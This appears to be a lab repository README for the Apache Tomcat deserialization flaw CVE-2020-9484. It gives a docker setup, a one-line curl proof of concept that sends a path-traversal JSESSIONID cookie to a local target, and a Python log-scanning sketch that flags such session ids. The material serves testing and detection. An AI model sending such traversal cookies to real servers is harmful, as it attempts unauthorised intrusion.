# Apache Tomcat Deserialization Vulnerability (CVE-2020-9484)

## Vulnerable target setup

- Clone this repository
- Run `docker-compose up -d`

That's it!

## Exploit POC

Run:

```sh
curl -v 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/cfx'
```

A file named `coldfx` gets created in the tmp directory.
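The PoC request is recognizable by its `JSESSIONID` value, which is a relative path rather than a session id. The following detection sketch is an added example, not part of this repository: it scans access-log lines for session ids containing path syntax, assuming a log layout of `%h "%r" "%{Cookie}i"`. The function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed access-log layout (AccessLogValve pattern: %h "%r" "%{Cookie}i").
LINE = re.compile(r'^(?P<host>\S+) "\S+ (?P<target>\S+)[^"]*" "(?P<cookie>[^"]*)"$')
# Path syntax has no place in a session id: "..", "/", "\" or NUL.
TRAVERSAL = re.compile(r"\.\.|[/\\\x00]")
URL_PARAM = re.compile(r";jsessionid=([^;?#/]*)", re.I)

# Constructed sample input; the second cookie is the value from the PoC request above.
SAMPLE_LOG = """\
192.0.2.10 "GET /index.jsp HTTP/1.1" "JSESSIONID=5A1F0C3B9E7D42A6B8C4D2E1F0A9B7C6"
192.0.2.44 "GET /index.jsp HTTP/1.1" "theme=dark; JSESSIONID=../../../../../usr/local/tomcat/cfx"
192.0.2.11 "GET /app;jsessionid=0123456789ABCDEF0123456789ABCDEF.node1 HTTP/1.1" "-"
"""


def session_ids(cookie_header, request_target=""):
    """Yield each session id a request carries: Cookie header or ;jsessionid= URL parameter."""
    for part in cookie_header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name.upper() == "JSESSIONID":
            yield value.strip()
    for match in URL_PARAM.finditer(request_target):
        yield match.group(1)


def is_suspicious(session_id):
    """True when the id, after peeling percent-encoding, contains path syntax."""
    for _ in range(3):  # peel nested encoding such as %252e
        session_id = unquote(session_id)
    return bool(TRAVERSAL.search(session_id))


def scan(log_text):
    """Return (client, session_id) for every request whose session id looks like a path."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if m:  # lines not in the assumed layout are skipped
            findings += [(m["host"], sid)
                         for sid in session_ids(m["cookie"], m["target"]) if is_suspicious(sid)]
    return findings


if __name__ == "__main__":
    for client, sid in scan(SAMPLE_LOG):
        print(f"{client}\tJSESSIONID={sid}")
```

Tomcat does not log the `Cookie` header by default, so the access-log pattern has to include `%{Cookie}i` for this check to have anything to read.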